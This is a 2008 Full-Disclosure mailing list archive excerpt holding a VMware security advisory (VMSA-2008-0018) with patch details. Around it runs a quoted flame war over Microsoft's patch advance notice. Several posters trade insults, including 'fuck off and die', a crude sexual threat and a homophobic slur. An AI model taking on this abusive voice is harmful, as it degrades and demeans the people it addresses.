> people like the sheep do, i think for myself, have opinions about
> other white hats that may not be in support of them. get used to it
> bozo.
>
> On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee wrote:
> > Acting like the child that he is, n3td3v continues to ignore questions
> posed
> > to him. How can he be such an avid debater over the legality of things
> like
> > metasploit, 0day auctions and similarly themed bullshit threads when he
> > completely disregards drug laws? How do you intend to lobby people to
> listen
> > to you when you are not a law abiding citizen yourself? You have no
> > credibility in the eyes of the law, so don't psuedo threaten people
> trying
> > to appear like you have some government backing. You have proven beyond
> > doubt that you dont, because the government doesnt listen to drug taking
> > internet heroes, such as yourself.
> >
> > So enough with the bullshit.. FUCK OFF AND DIE.
> >
> >
> > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v wrote:
> >>
> >> i'm sorry that you don't agree with my heads up theory, i stand by
> >> what i said however. i'm sure microsoft don't read full-disclosure
> >> anyway, so you're right i'm not going to change anything. by the way,
> >> i've noticed you haven't stopped stalking me yet, im a bit concerned
> >> about your health. cheers.
> >>
> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet wrote:
> >> > first off, u arent going to get any1 2 change anything. so, lets get
> >> > that out of the way right there.
> >> > > >> > second of all, in order for u 2 prove ur point, id like 4 u to go to > >> > some research of how many exploits have come out during the 5 day > >> > period between vague-ass disclosure and patch publish. then compare > >> > and contrast that against how many exploits have come out in the 24 > >> > hours following the patch publish after people have had a chance to do > >> > bindiffs (u know what that means right white-hat?) against the > >> > patches. then, take all that data, draw some charts and graphs, write > >> > a whitepaper, and present it somewhere. > >> > > >> > u know what thats called? research. real ppl do it. > >> > > >> > u dont. and that is why, u suck. ta ta. > >> > > >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v wrote: > >> >> so you don't think its logical that these 5 day heads up could be > >> >> helping the bad guys out? right. i think the world's biggest hackers > >> >> could do a lot of research in 5 days. but then again n3td3v isn't > >> >> logical so i must be wrong. damn those drugs eh? i just asked what > the > >> >> realistic possibility was for a 5 day turn around from the day of the > >> >> heads up until a patch is released. i just thought it was bad that we > >> >> were giving the bad guys a 5 day head start, but never mind n3td3v > >> >> isn't logical so i must be wrong. scraping the 5 day head start isn't > >> >> a good idea because n3td3v isn't logical? right, i threw away 10 > years > >> >> of my life to not be logical... > >> >> > >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad < > waveroad at gmail.com> > >> >> wrote: > >> >>> > >> >>> You can be ""monitoring"" the scene since 20 years if you want to, > >> >>> it's not > >> >>> for that your point will be valuable. > >> >>> And actually it is not, also this is about logic. > >> >>> > >> >>> See you're wrong again. > >> >>> > >> >>> Get the fuck out of here. 
> >> >>> > >> >>> > >> >>> > >> >>> > >> >>> > >> >>> > >> >>> > >> >>> > >> >>> 2008/11/6, n3td3v : > >> >>>> > >> >>>> i've been monitoring the scene since 1999 so what do you mean no > >> >>>> experience? i make that about 10 years experience if my math is > >> >>>> correct. > >> >>>> > >> >>>> > >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee > >> >>>> wrote: > >> >>>> > Do you even understand why people dont like you? It is because > you > >> >>>> > have > >> >>>> > all > >> >>>> > these crackpot ideas but no experience to back it up. All your > >> >>>> > ideas > >> >>>> > only > >> >>>> > make sense from a theoretical standpoint, but in practicality > most > >> >>>> > will > >> >>>> > fail. > >> >>>> > > >> >>>> > >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v > >> >>>> > wrote: > >> >>>> >> > >> >>>> >> blackhats like you will always hate on me, so i just ignore the > >> >>>> >> negative responses i get. > >> >>>> > > >> >>>> > >> >>>> > >> >>>> _______________________________________________ > >> >>>> Full-Disclosure - We believe in it. > >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >>>> Hosted and sponsored by Secunia - http://secunia.com/ > >> >>> > >> >>> > >> >>> _______________________________________________ > >> >>> Full-Disclosure - We believe in it. > >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >>> Hosted and sponsored by Secunia - http://secunia.com/ > >> >>> > >> >> > >> >> _______________________________________________ > >> >> Full-Disclosure - We believe in it. > >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >> Hosted and sponsored by Secunia - http://secunia.com/ > >> >> > >> > > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. 
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/b8d3062b/attachment.html

From xploitable at gmail.com Fri Nov 7 05:31:42 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 05:31:42 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To:
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
 <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
 <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
 <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
 <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
 <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
 <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
 <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
Message-ID: <4b6ee9310811062131h353b06f4g3ed55c80fadbaeee@mail.gmail.com>

why should i respond to your off-topic personal jabs? all it would do
is start a flame war and im not into that. im performing self control
and restraint by not responding to your personal jabs, nobody on the
list wants a flame war based on personal jabs, so im not going to feed
it. im reading everything you say, im not ignoring it. if you choose
to be against me and not with me is your choice that you make, there
is nothing else for me to add on the topic.

On Fri, Nov 7, 2008 at 5:09 AM, Biz Marqee wrote:
>
> I could care less about metasploit, all it does is help the kiddies.. but
> that doesnt mean it should be illegal.
Software is knowledge and knowledge > should be free, but that is not the issue here. The issue is that you are a > bullshitting drug abuser who's child like demeanor wont allow him to even > acknowledge bad things written about him. You are performing the internet > equivalent of sticking your fingers in your ears and yelling "nana i cant > hear you" in an attempt to make the situation go away. > > So you unknowledgable, untalented, unemployed junkie.. do you have anything > relevant to what I asked to contribute or are you going to just ignore it > like the pussy that you are? > > Also, dont try and portray yourself like a free thinking martyr... your > opinions are just rehashed idea sparked off cnet news comments and various > other sources of "security information". Anyone who knows even the slightest > thing about information security knows you and your idealist views are a > joke. > > > On Fri, Nov 7, 2008 at 3:46 PM, n3td3v wrote: >> >> you seem like an hd moore/metasploit fan boy pissed off that i don't >> respect him or like his metasploit software. n3td3v doesn't respect >> people like the sheep do, i think for myself, have opinions about >> other white hats that may not be in support of them. get used to it >> bozo. >> >> On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee wrote: >> > Acting like the child that he is, n3td3v continues to ignore questions >> > posed >> > to him. How can he be such an avid debater over the legality of things >> > like >> > metasploit, 0day auctions and similarly themed bullshit threads when he >> > completely disregards drug laws? How do you intend to lobby people to >> > listen >> > to you when you are not a law abiding citizen yourself? You have no >> > credibility in the eyes of the law, so don't psuedo threaten people >> > trying >> > to appear like you have some government backing. You have proven beyond >> > doubt that you dont, because the government doesnt listen to drug taking >> > internet heroes, such as yourself. 
>> > >> > So enough with the bullshit.. FUCK OFF AND DIE. >> > >> > >> > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v wrote: >> >> >> >> i'm sorry that you don't agree with my heads up theory, i stand by >> >> what i said however. i'm sure microsoft don't read full-disclosure >> >> anyway, so you're right i'm not going to change anything. by the way, >> >> i've noticed you haven't stopped stalking me yet, im a bit concerned >> >> about your health. cheers. >> >> >> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet wrote: >> >> > first off, u arent going to get any1 2 change anything. so, lets get >> >> > that out of the way right there. >> >> > >> >> > second of all, in order for u 2 prove ur point, id like 4 u to go to >> >> > some research of how many exploits have come out during the 5 day >> >> > period between vague-ass disclosure and patch publish. then compare >> >> > and contrast that against how many exploits have come out in the 24 >> >> > hours following the patch publish after people have had a chance to >> >> > do >> >> > bindiffs (u know what that means right white-hat?) against the >> >> > patches. then, take all that data, draw some charts and graphs, >> >> > write >> >> > a whitepaper, and present it somewhere. >> >> > >> >> > u know what thats called? research. real ppl do it. >> >> > >> >> > u dont. and that is why, u suck. ta ta. >> >> > >> >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v wrote: >> >> >> so you don't think its logical that these 5 day heads up could be >> >> >> helping the bad guys out? right. i think the world's biggest hackers >> >> >> could do a lot of research in 5 days. but then again n3td3v isn't >> >> >> logical so i must be wrong. damn those drugs eh? i just asked what >> >> >> the >> >> >> realistic possibility was for a 5 day turn around from the day of >> >> >> the >> >> >> heads up until a patch is released. 
i just thought it was bad that >> >> >> we >> >> >> were giving the bad guys a 5 day head start, but never mind n3td3v >> >> >> isn't logical so i must be wrong. scraping the 5 day head start >> >> >> isn't >> >> >> a good idea because n3td3v isn't logical? right, i threw away 10 >> >> >> years >> >> >> of my life to not be logical... >> >> >> >> >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad >> >> >> >> >> >> wrote: >> >> >>> >> >> >>> You can be ""monitoring"" the scene since 20 years if you want to, >> >> >>> it's not >> >> >>> for that your point will be valuable. >> >> >>> And actually it is not, also this is about logic. >> >> >>> >> >> >>> See you're wrong again. >> >> >>> >> >> >>> Get the fuck out of here. >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> 2008/11/6, n3td3v : >> >> >>>> >> >> >>>> i've been monitoring the scene since 1999 so what do you mean no >> >> >>>> experience? i make that about 10 years experience if my math is >> >> >>>> correct. >> >> >>>> >> >> >>>> >> >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee >> >> >>>> wrote: >> >> >>>> > Do you even understand why people dont like you? It is because >> >> >>>> > you >> >> >>>> > have >> >> >>>> > all >> >> >>>> > these crackpot ideas but no experience to back it up. All your >> >> >>>> > ideas >> >> >>>> > only >> >> >>>> > make sense from a theoretical standpoint, but in practicality >> >> >>>> > most >> >> >>>> > will >> >> >>>> > fail. >> >> >>>> > >> >> >>>> >> >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v >> >> >>>> > wrote: >> >> >>>> >> >> >> >>>> >> blackhats like you will always hate on me, so i just ignore the >> >> >>>> >> negative responses i get. >> >> >>>> > >> >> >>>> >> >> >>>> >> >> >>>> _______________________________________________ >> >> >>>> Full-Disclosure - We believe in it. 
>> >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >> >>>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >>> >> >> >>> >> >> >>> _______________________________________________ >> >> >>> Full-Disclosure - We believe in it. >> >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >> >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >>> >> >> >> >> >> >> _______________________________________________ >> >> >> Full-Disclosure - We believe in it. >> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >> >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> >> >> > >> >> >> >> _______________________________________________ >> >> Full-Disclosure - We believe in it. >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >> > >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From security at vmware.com Fri Nov 7 05:41:05 2008
From: security at vmware.com (VMware Security Team)
Date: Thu, 06 Nov 2008 21:41:05 -0800
Subject: [Full-disclosure] VMSA-2008-0018 VMware Hosted products and patches for ESX and ESXi resolve two security issues
Message-ID: <4913D4F1.80300@vmware.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
VMware Security Advisory

Advisory ID:  VMSA-2008-0018
Synopsis:     VMware Hosted products and patches for ESX and ESXi
              resolve two security issues
Issue date:   2008-11-06
Updated on:   2008-11-06 (initial release of advisory)
CVE numbers:  CVE-2008-4915 CVE-2008-4281
- ------------------------------------------------------------------------

1. Summary

VMware Hosted products and patches for ESX and ESXi resolve multiple
security issues. A flaw in the CPU hardware emulation may allow for a
privilege escalation on virtual machine guest operating systems. In
addition a directory traversal issue is resolved.

2. Relevant releases

VMware Workstation 6.0.5 and earlier,
VMware Workstation 5.5.8 and earlier,
VMware Player 2.0.5 and earlier,
VMware Player 1.0.8 and earlier,
VMware ACE 2.0.5 and earlier,
VMware ACE 1.0.7 and earlier,
VMware Server 1.0.7 and earlier.

VMware ESXi 3.5 without patch ESXe350-200810401-O-UG

VMware ESX 3.5 without patch ESX350-200810201-UG
VMware ESX 3.0.3 without patch ESX303-200810501-BG
VMware ESX 3.0.2 without patch ESX-1006680
VMware ESX 2.5.5 without upgrade patch 10 or later
VMware ESX 2.5.4 without upgrade patch 21

NOTE: Hosted products VMware Workstation 5.x, VMware Player 1.x, and
VMware ACE 1.x will reach end of general support 2008-11-09. Customers
should plan to upgrade to the latest version of their respective
products.
Extended support (Security and Bug fixes) for ESX 3.0.2 ended on
2008-10-29 and Extended support for ESX 3.0.2 Update 1 ends on
2009-08-08. Users should plan to upgrade to ESX 3.0.3 and preferably to
the newest release available.

3. Problem Description

a. A privilege escalation on 32-bit and 64-bit guest operating systems

VMware products emulate hardware functions and create the possibility
to run guest operating systems.

A flaw in the CPU hardware emulation might allow the virtual CPU to
incorrectly handle the Trap flag. Exploitation of this flaw might lead
to a privilege escalation on guest operating systems. An attacker needs
a user account on the guest operating system and have the ability to
run applications.

VMware would like to thank Derek Soeder for discovering this issue and
working with us on its remediation.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2008-4915 to this issue.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running   Replace with/
Product        Version   on        Apply Patch
=============  ========  =======   =================
VirtualCenter  any       Windows   not affected
Workstation    6.5.x     any       not affected
Workstation    6.0.x     any       6.5.0 build 118166 or later
Workstation    5.x       any       5.5.9 build 126128 or later
Player         2.5.x     any       not affected
Player         2.0.x     any       2.5.0 build 118166 or later
Player         1.x       any       1.0.9 build 126128 or later
ACE            2.5.x     Windows   not affected
ACE            2.0.x     Windows   2.5.0 build 118166 or later
ACE            1.x       Windows   1.0.8 build 125922 or later
Server         2.x       any       not affected
Server         1.x       any       1.0.8 build 126538 or later
Fusion         2.x       Mac OS/X  not affected
Fusion         1.x       Mac OS/X  not affected
ESXi           3.5       ESXi      ESXe350-200810401-O-UG
ESX            3.5       ESX       ESX350-200810201-UG
ESX            3.0.3     ESX       ESX303-200810501-BG
ESX            3.0.2     ESX       ESX-1006680
ESX            2.5.5     ESX       ESX 2.5.5 upgrade patch 10 or later
ESX            2.5.4     ESX       ESX 2.5.4 upgrade patch 21

b. Directory traversal vulnerability

VirtualCenter allows administrators to have fine-grained privileges. A
directory traversal vulnerability might allow administrators to
increase these privileges. In order to leverage this flaw, the
administrator would need to have the Datastore.FileManagement
privilege.

VMware would like to thank Michel Toussaint for reporting this issue to
us.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2008-4281 to this issue.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running   Replace with/
Product        Version   on        Apply Patch
=============  ========  =======   =================
VirtualCenter  any       Windows   not affected
hosted *       any       any       not affected
ESXi           3.5       ESXi      ESXe350-200810401-O-UG
ESX            3.5       ESX       ESX350-200810201-UG
ESX            3.0.3     ESX       not affected
ESX            3.0.2     ESX       not affected
ESX            2.5.5     ESX       not affected
ESX            2.5.4     ESX       not affected

* hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

Please review the patch/release notes for your product and version and
verify the md5sum of your downloaded file.
VMware Workstation 5.5.9
------------------------
http://www.vmware.com/download/ws/ws5.html
Release notes:
http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html

Windows binary:
md5sum: 509c7b323a8ac42c0a92b0a1446bb0f8

Compressed Tar archive for 32-bit Linux
md5sum: 9d189e72f8111e44b27f1ee92edf265e

Linux RPM version for 32-bit Linux
md5sum: 0957c5258d033d0107517df64bfea240

VMware Player 1.0.9
-----------------------------
http://www.vmware.com/download/player/
Release notes Player 1.x:
http://www.vmware.com/support/player/doc/releasenotes_player.html

Windows binary
md5sum: e2c8dd7b27df7d348f14f69de017b93f

Player 1.0.9 for Linux (.rpm)
md5sum: 471c3881fa60b058b1dac1d3c9c32c85

Player 1.0.9 for Linux (.tar)
md5sum: bef507811698e7333f5e8cb672530dbf

VMware ACE 1.0.8
----------------
http://www.vmware.com/download/ace/
Release notes:
http://www.vmware.com/support/ace/doc/releasenotes_ace.html

Windows binary
md5sum: 920a08c2fcdeaedcb3258183817419a0

ACE 1.0.8 for Linux (.rpm)
md5sum: 450254b73fa6802713136bf2c04e5b40

ACE 1.0.8 for Linux (.tar)
md5sum: 5efdaccf8217b8d7875d3f35cd6159e0

VMware Server 1.0.8
-------------------
http://www.vmware.com/download/server/
Release notes:
http://www.vmware.com/support/server/doc/releasenotes_server.html

VMware Server for Windows 32-bit and 64-bit
md5sum: 4ba41e5fa192f786121a7395ebaa8d7c

VMware Server Windows client package
md5sum: f25746e275ca00f28d44ad372fc92536

VMware Server for Linux
md5sum: a476d3953ab1ff8457735e692fa5edf9

VMware Server for Linux rpm
md5sum: af6890506618fa82928fbfba8a5f97e1

Management Interface
md5sum: 5982b84a39479cabce63e12ab664d369

VMware Server Linux client package
md5sum: 605d7db48f63211cc3f5ddb2b3f915a6

ESXi
----
ESXi 3.5 patch ESXe350-200810401-O-UG
http://download3.vmware.com/software/vi/ESXe350-200810401-O-UG.zip
md5sum: 9b83c54a005572bebb86652e3efd732a
http://kb.vmware.com/kb/1007056

NOTE: The three ESXi patches for Firmware "I", VMware Tools "T," and
the VI Client "C" are contained in a single offline "O" download file.

ESX
---
ESX Server 3.5 update 3 CD image Refresh
md5sum: e9bdaad2d37872820a4cad8e8dbde536
http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

ESX Server 3.5 upgrade package from ESX Server 2.x to ESX Server 3.5 Update 3 Refresh
md5sum:2da08fed15bd4b1ed5b19433e837591c
http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

ESX Server 3.5 upgrade package from ESX Server 3.0.x to ESX Server 3.5 Update 3 Refresh
md5sum:d631aa8418d99fce4280fc3905ac4c37
http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

ESX Server 3.5 upgrade package from ESX Server 3.5 to ESX Server 3.5 Update 3 Refresh
md5sum:4dea5d943d0c0469c397b6520dfeb0fb
http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

ESX 3.5 patch ESX350-200810201-UG (vCPU/directory traversal)
http://download3.vmware.com/software/vi/ESX350-200810201-UG.zip
md5sum: 6f26f985d9fea520ebdda7c65b60486e
http://kb.vmware.com/kb/1007041

ESX 3.0.3 patch ESX303-200810501-BG (vCPU)
http://download3.vmware.com/software/vi/ESX303-200810501-BG.zip
md5sum: da72f475c5ac038379d712d36307e33d
http://kb.vmware.com/kb/1006969

ESX 3.0.2 patch ESX-1006680 (vCPU)
http://download3.vmware.com/software/vi/ESX-1006680.tgz
md5sum: 8186a2e77bc7c0e4cd5b214d0a5d29c0
http://kb.vmware.com/kb/1006680

VMware ESX 2.5.5 Upgrade Patch 10
http://download3.vmware.com/software/esx/esx-2.5.5-119702-upgrade.tar.gz
md5sum: 2ee87cdd70b1ba84751e24c0bd8b4621
http://vmware.com/support/esx25/doc/esx-255-200810-patch.html

VMware ESX 2.5.4 Upgrade Patch 21
http://download3.vmware.com/software/esx/esx-2.5.4-119703-upgrade.tar.gz
md5sum: d791be525c604c852a03dd7df0eabf35
http://vmware.com/support/esx25/doc/esx-254-200810-patch.html

5. References

CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4915
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4281

- ------------------------------------------------------------------------
6. Change log

2008-11-06 VMSA-2008-0018
Initial security advisory after release of VMware Workstation, VMware
Player, VMware ACE, VMware Server and ESXi and ESX 3.5 Update 3 on
2008-11-06.

- -----------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2008 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8 wj8DBQFJE9TRS2KysvBH1xkRArqUAJ9lo3j0TD709+27HlDCa7E8igu+AgCfZTTC O60MAdvOuLJHSO8DOJ7SLx8= =BOi5 -----END PGP SIGNATURE----- From biz.marqee at gmail.com Fri Nov 7 05:51:57 2008 From: biz.marqee at gmail.com (Biz Marqee) Date: Fri, 7 Nov 2008 16:51:57 +1100 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <4b6ee9310811062131h353b06f4g3ed55c80fadbaeee@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com> <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com> <4b6ee9310811062131h353b06f4g3ed55c80fadbaeee@mail.gmail.com> Message-ID: Nobody on the list wants YOU so I don't see how you can justify what people want to see as your argument for not retaliating. Ill fuck you 'til you love me, faggot. On Fri, Nov 7, 2008 at 4:31 PM, n3td3v wrote: > why should i respond to your off-topic personal jabs? all it would do > is start a flame war and im not into that. im performing self control > and restraint by not responding to your personal jabs, nobody on the > list wants a flame war based on personal jabs, so im not going to feed > it. im reading everything you say, im not ignoring it. if you choose > to be against me and not with me is your choice that you make, there > is nothing else for me to add on the topic. > > On Fri, Nov 7, 2008 at 5:09 AM, Biz Marqee wrote: > > > > I could care less about metasploit, all it does is help the kiddies.. but > > that doesnt mean it should be illegal. Software is knowledge and > knowledge > > should be free, but that is not the issue here. 
The issue is that you are > a > > bullshitting drug abuser who's child like demeanor wont allow him to even > > acknowledge bad things written about him. You are performing the internet > > equivalent of sticking your fingers in your ears and yelling "nana i cant > > hear you" in an attempt to make the situation go away. > > > > So you unknowledgable, untalented, unemployed junkie.. do you have > anything > > relevant to what I asked to contribute or are you going to just ignore it > > like the pussy that you are? > > > > Also, dont try and portray yourself like a free thinking martyr... your > > opinions are just rehashed idea sparked off cnet news comments and > various > > other sources of "security information". Anyone who knows even the > slightest > > thing about information security knows you and your idealist views are a > > joke. > > > > > > On Fri, Nov 7, 2008 at 3:46 PM, n3td3v wrote: > >> > >> you seem like an hd moore/metasploit fan boy pissed off that i don't > >> respect him or like his metasploit software. n3td3v doesn't respect > >> people like the sheep do, i think for myself, have opinions about > >> other white hats that may not be in support of them. get used to it > >> bozo. > >> > >> On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee > wrote: > >> > Acting like the child that he is, n3td3v continues to ignore questions > >> > posed > >> > to him. How can he be such an avid debater over the legality of things > >> > like > >> > metasploit, 0day auctions and similarly themed bullshit threads when > he > >> > completely disregards drug laws? How do you intend to lobby people to > >> > listen > >> > to you when you are not a law abiding citizen yourself? You have no > >> > credibility in the eyes of the law, so don't psuedo threaten people > >> > trying > >> > to appear like you have some government backing. You have proven > beyond > >> > doubt that you dont, because the government doesnt listen to drug > taking > >> > internet heroes, such as yourself. 
> >> > > >> > So enough with the bullshit.. FUCK OFF AND DIE. > >> > > >> > > >> > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v wrote: > >> >> > >> >> i'm sorry that you don't agree with my heads up theory, i stand by > >> >> what i said however. i'm sure microsoft don't read full-disclosure > >> >> anyway, so you're right i'm not going to change anything. by the way, > >> >> i've noticed you haven't stopped stalking me yet, im a bit concerned > >> >> about your health. cheers. > >> >> > >> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet wrote: > >> >> > first off, u arent going to get any1 2 change anything. so, lets > get > >> >> > that out of the way right there. > >> >> > > >> >> > second of all, in order for u 2 prove ur point, id like 4 u to go > to > >> >> > some research of how many exploits have come out during the 5 day > >> >> > period between vague-ass disclosure and patch publish. then > compare > >> >> > and contrast that against how many exploits have come out in the 24 > >> >> > hours following the patch publish after people have had a chance to > >> >> > do > >> >> > bindiffs (u know what that means right white-hat?) against the > >> >> > patches. then, take all that data, draw some charts and graphs, > >> >> > write > >> >> > a whitepaper, and present it somewhere. > >> >> > > >> >> > u know what thats called? research. real ppl do it. > >> >> > > >> >> > u dont. and that is why, u suck. ta ta. > >> >> > > >> >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v > wrote: > >> >> >> so you don't think its logical that these 5 day heads up could be > >> >> >> helping the bad guys out? right. i think the world's biggest > hackers > >> >> >> could do a lot of research in 5 days. but then again n3td3v isn't > >> >> >> logical so i must be wrong. damn those drugs eh? i just asked what > >> >> >> the > >> >> >> realistic possibility was for a 5 day turn around from the day of > >> >> >> the > >> >> >> heads up until a patch is released. 
i just thought it was bad that > >> >> >> we > >> >> >> were giving the bad guys a 5 day head start, but never mind n3td3v > >> >> >> isn't logical so i must be wrong. scraping the 5 day head start > >> >> >> isn't > >> >> >> a good idea because n3td3v isn't logical? right, i threw away 10 > >> >> >> years > >> >> >> of my life to not be logical... > >> >> >> > >> >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad > >> >> >> > >> >> >> wrote: > >> >> >>> > >> >> >>> You can be ""monitoring"" the scene since 20 years if you want > to, > >> >> >>> it's not > >> >> >>> for that your point will be valuable. > >> >> >>> And actually it is not, also this is about logic. > >> >> >>> > >> >> >>> See you're wrong again. > >> >> >>> > >> >> >>> Get the fuck out of here. > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> 2008/11/6, n3td3v : > >> >> >>>> > >> >> >>>> i've been monitoring the scene since 1999 so what do you mean no > >> >> >>>> experience? i make that about 10 years experience if my math is > >> >> >>>> correct. > >> >> >>>> > >> >> >>>> > >> >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee < > biz.marqee at gmail.com> > >> >> >>>> wrote: > >> >> >>>> > Do you even understand why people dont like you? It is because > >> >> >>>> > you > >> >> >>>> > have > >> >> >>>> > all > >> >> >>>> > these crackpot ideas but no experience to back it up. All your > >> >> >>>> > ideas > >> >> >>>> > only > >> >> >>>> > make sense from a theoretical standpoint, but in practicality > >> >> >>>> > most > >> >> >>>> > will > >> >> >>>> > fail. > >> >> >>>> > > >> >> >>>> > >> >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v > > >> >> >>>> > wrote: > >> >> >>>> >> > >> >> >>>> >> blackhats like you will always hate on me, so i just ignore > the > >> >> >>>> >> negative responses i get. 
> >> >> >>>> > > >> >> >>>> > >> >> >>>> > >> >> >>>> _______________________________________________ > >> >> >>>> Full-Disclosure - We believe in it. > >> >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >> >>>> Hosted and sponsored by Secunia - http://secunia.com/ > >> >> >>> > >> >> >>> > >> >> >>> _______________________________________________ > >> >> >>> Full-Disclosure - We believe in it. > >> >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >> >>> Hosted and sponsored by Secunia - http://secunia.com/ > >> >> >>> > >> >> >> > >> >> >> _______________________________________________ > >> >> >> Full-Disclosure - We believe in it. > >> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >> >> Hosted and sponsored by Secunia - http://secunia.com/ > >> >> >> > >> >> > > >> >> > >> >> _______________________________________________ > >> >> Full-Disclosure - We believe in it. > >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > > >> > > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... 
